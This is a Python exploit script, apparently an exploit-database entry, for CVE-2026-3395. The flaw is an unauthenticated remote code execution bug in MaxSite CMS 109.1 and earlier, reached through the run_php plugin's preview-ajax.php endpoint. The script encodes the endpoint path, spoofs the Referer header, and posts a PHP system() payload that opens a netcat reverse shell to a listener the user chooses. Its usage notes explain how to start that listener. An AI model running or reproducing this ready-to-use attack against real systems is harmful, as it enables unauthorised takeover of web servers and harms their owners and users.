#!/usr/bin/env python3 # Exploit Title: MaxSite CMS <= 109.1 unauthenticated RCE via run_php plugin # CVE: CVE-2026-3395 # Date: 2026-03-01 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://max-3000.com/ # Software Link: https://github.com/maxsite/cms # Affected: MaxSite CMS <= 109.1 with run_php plugin enabled # Tested on: MaxSite CMS 109.1 # Category: Webapps # Platform: PHP # Exploit Type: Remote Code Execution # CVSS: 9.8 (Critical) # CWE: CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) # Description: Unauthenticated RCE in preview-ajax.php through eval() in run_php plugin # Fixed in: MaxSite CMS 109.2 (commit 08937a3c5d672a242d68f53e9fccf8a748820ef3) # Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://target.com --lhost 192.168.1.100 --lport 4444 # # Options: # --lhost Listener IP for reverse shell # --lport Listener port # # Notes: # Requires run_php plugin to be enabled (common default) # Bypasses weak referrer check # # How to Use # Step 1: Start a listener (e.g. nc -lvnp 4444) # Step 2: Run the exploit print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-3395 • MaxSite CMS RCE via run_php ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import base64 import argparse import sys def main(): parser = argparse.ArgumentParser(description="CVE-2026-3395 - MaxSite CMS unauthenticated RCE") parser.add_argument("target", help="Target URL (e.g. http://target.com)") parser.add_argument("--lhost", required=True, help="Listener IP for reverse shell") parser.add_argument("--lport", required=True, help="Listener port") args = parser.parse_args() target = args.target.rstrip("/") lhost = args.lhost lport = args.lport b64_path = base64.b64encode(b"admin/plugins/editor_markitup/preview-ajax.php").decode() url = f"{target}/ajax/{b64_path}" revshell = f"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f" payload = f"[php]system('{revshell}');[/php]" headers = {"Referer": target} data = {"data": payload} print(f"[*] Sending payload to: {url}") print(f"[*] Reverse shell → {lhost}:{lport}") try: r = requests.post(url, data=data, headers=headers, timeout=12) if r.status_code == 200: print("[+] Request sent successfully") print("[+] Check your listener for connection") else: print(f"[-] Unexpected status code: {r.status_code}") print(f"Response: {r.text[:300]}...") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": main()